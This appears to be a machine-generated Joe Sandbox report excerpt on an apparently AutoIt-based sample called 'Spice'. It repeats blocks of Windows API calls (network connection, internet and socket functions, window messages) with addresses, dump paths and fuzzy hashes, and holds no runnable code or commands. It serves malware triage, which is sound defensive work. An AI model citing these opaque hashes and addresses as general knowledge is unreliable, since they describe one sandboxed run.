                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E8436A: _wcscpy.LIBCMT ref: 00E8438D
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __itow.LIBCMT ref: 00E74D62
                                                                                                                                                                                                                                        • Part of subcall function 00E74D37: __swprintf.LIBCMT ref: 00E74DAC
                                                                                                                                                                                                                                      • __wcsnicmp.LIBCMT ref: 00EDB670
                                                                                                                                                                                                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EDB739
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                                                                                                                                      • String ID: LPT
                                                                                                                                                                                                                                      • API String ID: 3222508074-1350329615
                                                                                                                                                                                                                                      • Opcode ID: 30d4d7d2fa8d56136b4426a8498dfaac2bdec7c2baa5f4415e90e844bfe5a68e
                                                                                                                                                                                                                                      • Instruction ID: 16fd1982bdf28900513973f8fb858943e2aa22951555b3af5638c276920328c5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 30d4d7d2fa8d56136b4426a8498dfaac2bdec7c2baa5f4415e90e844bfe5a68e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14615E75A00219EFCB14DF54C881EAEB7F4EB48310F05915AF55ABB391EB70AE41CB54
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _memmove
                                                                                                                                                                                                                                      • String ID: #V
                                                                                                                                                                                                                                      • API String ID: 4104443479-3658881132
                                                                                                                                                                                                                                      • Opcode ID: e12816fabd4b4132f48e8ffe6bcd7838fdf1b888ad09fa14fc351e55ed6b8ffb
                                                                                                                                                                                                                                      • Instruction ID: e8657f59b90518c87d6ffee6165613e276f44b8a9abfe2fea8608c1421a78deb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e12816fabd4b4132f48e8ffe6bcd7838fdf1b888ad09fa14fc351e55ed6b8ffb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C518370904609DFCF24CF68D880AEEBBF1FF45308F249529E89AE7650E731A955CB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000000), ref: 00E7E01E
                                                                                                                                                                                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00E7E037
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                      • Opcode ID: baa6dc63391f44c0e6504b2ca2a6f0afc9e87b2451540efeae7c4fe46eb9b701
                                                                                                                                                                                                                                      • Instruction ID: 5b0a8277d28108235eb8213436522d2e58db2bc9154b744290e4633dbf8471d6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: baa6dc63391f44c0e6504b2ca2a6f0afc9e87b2451540efeae7c4fe46eb9b701
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0C5128B1408748EBE320AF50EC86BAFBBF8FB84714F51885DF2D8511A1DB709529CB56
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00EF8186
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EF819B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID: '
                                                                                                                                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                      • Opcode ID: 1b7b75c39a173bff427eda21a472d8095c0278d79009cb4783670a0d92455586
                                                                                                                                                                                                                                      • Instruction ID: 7cb2bac828b08ffccebfb49bc56d79b98382b4f87c06f1fa603f17662db74da9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b7b75c39a173bff427eda21a472d8095c0278d79009cb4783670a0d92455586
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50410874A0130D9FDB14CF64C981BEA7BB5FB08304F50116AEA08EB351DB31A956CF90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00EE2C6A
                                                                                                                                                                                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00EE2CA0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CrackInternet_memset
                                                                                                                                                                                                                                      • String ID: |
                                                                                                                                                                                                                                      • API String ID: 1413715105-2343686810
                                                                                                                                                                                                                                      • Opcode ID: fa89b7489523151357cfeef660e3622da5a999a02be0cbab93e38e3cf3e54b90
                                                                                                                                                                                                                                      • Instruction ID: a2358bbd0b8ce43348cb804a1b881ef2469359b456d1f8679ea350a7f720705c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fa89b7489523151357cfeef660e3622da5a999a02be0cbab93e38e3cf3e54b90
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20311971C00219ABCF11EFA1DC85AEEBFB9FF08354F101059F919B6262EB315956DBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 00EF713C
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00EF7178
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                      • Opcode ID: d6cffbaf05d6b398f49f056066461c56747e15e849b3752d16eb198d459ae7eb
                                                                                                                                                                                                                                      • Instruction ID: 3fc680fcad689d7961cb778c2afcdecad3c42f1065f7323ab612ef660e5bec59
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6cffbaf05d6b398f49f056066461c56747e15e849b3752d16eb198d459ae7eb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57318F71100608AEDB109F78CC80BFB77A9FF48724F10A619FAA9E7190DB31AC95D760
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ED30B8
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00ED30F3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                                                                                                                                      • Opcode ID: f17e20ae1b5d3c5409e8068359597f2c601e1b240513bdcefadff0faeea3625a
                                                                                                                                                                                                                                      • Instruction ID: 525f60144f50a4ebe5299985825cafa79ad8c6b1f413dcc0e253aad2c127cb76
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f17e20ae1b5d3c5409e8068359597f2c601e1b240513bdcefadff0faeea3625a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC31F73160130A9FEB249F64C885BAEBBF8EF05354F14501AE885B63A1D7709B41CB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • __snwprintf.LIBCMT ref: 00EE4132
                                                                                                                                                                                                                                        • Part of subcall function 00E81A36: _memmove.LIBCMT ref: 00E81A77
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __snwprintf_memmove
                                                                                                                                                                                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                                                                                                      • API String ID: 3506404897-2584243854
                                                                                                                                                                                                                                      • Opcode ID: 8e81e94660c5a892406b1f1f923739f5c289515cd81a7a831cc65acd28ba4b0c
                                                                                                                                                                                                                                      • Instruction ID: 7769b019921d37e643c5c44cb973b2bf50005ae4667fe7d1f4ac6b8523f5eddb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e81e94660c5a892406b1f1f923739f5c289515cd81a7a831cc65acd28ba4b0c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D221C571A0021CABCF14EF65D881EAE77F9EF54340F401498F908B7281DB30E946DBA2
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EF6D86
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EF6D91
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID: Combobox
                                                                                                                                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                      • Opcode ID: 2489124a390b129b36834da428882b9ad8d9a65af902bf9c648522b974208b16
                                                                                                                                                                                                                                      • Instruction ID: e8bb62ee81adabec0026ca236b89a669670a7fe65eafc21bb7964707f6b36305
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2489124a390b129b36834da428882b9ad8d9a65af902bf9c648522b974208b16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3F11867131020C7FEF11AE54DC81EFB3B6BEB84368F115125FA18AB291D6729C519760
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E72111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E7214F
                                                                                                                                                                                                                                        • Part of subcall function 00E72111: GetStockObject.GDI32(00000011), ref: 00E72163
                                                                                                                                                                                                                                        • Part of subcall function 00E72111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E7216D
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00EF7296
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 00EF72B0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                      • Opcode ID: e6a87a96f49a6197e09d2e6449e0904a719012821b9f63a640a9aac0b0f6b7f5
                                                                                                                                                                                                                                      • Instruction ID: 1fa5c201d19cd229dcd425902f1a11e6043743f94f4632173be6bdce3080eb74
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6a87a96f49a6197e09d2e6449e0904a719012821b9f63a640a9aac0b0f6b7f5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A21177261420AAFEB14DFA8CC45AFA7BA9FB08314F005519FE95E3250DA35E851AB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00EF6FC7
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EF6FD6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                                                                                                                                      • String ID: edit
                                                                                                                                                                                                                                      • API String ID: 2978978980-2167791130
                                                                                                                                                                                                                                      • Opcode ID: ac1c56273976df35f5b89356752a3d2ee5a4427192f852b2cb51b81a5de2a442
                                                                                                                                                                                                                                      • Instruction ID: a5ddb45e109e0443a9c4246ab3b3dc1aaaf1b3800b27db78f8e0797a0eb51435
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac1c56273976df35f5b89356752a3d2ee5a4427192f852b2cb51b81a5de2a442
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D511547260020CAFEB105E64EC44EFB3B6AEB15378F505714FA65A71D0CB75DC50A760
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00ED31C9
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00ED31E8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 360cfaaf10d60ce64b57a8226717113bd4d47149910b7dc4dfa82e77ae1efd81
                                                                                                                                                                                                                                      • Instruction ID: 0e2ebba59117c13cf00c22ab4398129edd0ac220512d381e09fd1475d49c26a5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 360cfaaf10d60ce64b57a8226717113bd4d47149910b7dc4dfa82e77ae1efd81
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F11297690221AEBDB20DAB8DC05B9D73B8EB45314F141123E801B7360D770AF0BDB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EE28F8
                                                                                                                                                                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EE2921
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Internet$OpenOption
                                                                                                                                                                                                                                      • String ID: <local>
                                                                                                                                                                                                                                      • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                      • Opcode ID: ce36ab16e35e5a76642e4c887d527495a3246b276bf95e182177750da4d6f33e
                                                                                                                                                                                                                                      • Instruction ID: b12139026c5e4e49566eed26b7363306b90b9cb2941a4dd62433322ff3dc1a8a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce36ab16e35e5a76642e4c887d527495a3246b276bf95e182177750da4d6f33e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3111C17050126EBAEB288E52CC89EF6FB6CFF05355F10612EF64566100E7706850E6E4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EE86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00EE849D,?,00000000,?,?), ref: 00EE86F7
                                                                                                                                                                                                                                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00EE84A0
                                                                                                                                                                                                                                      • htons.WSOCK32(00000000,?,00000000), ref: 00EE84DD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
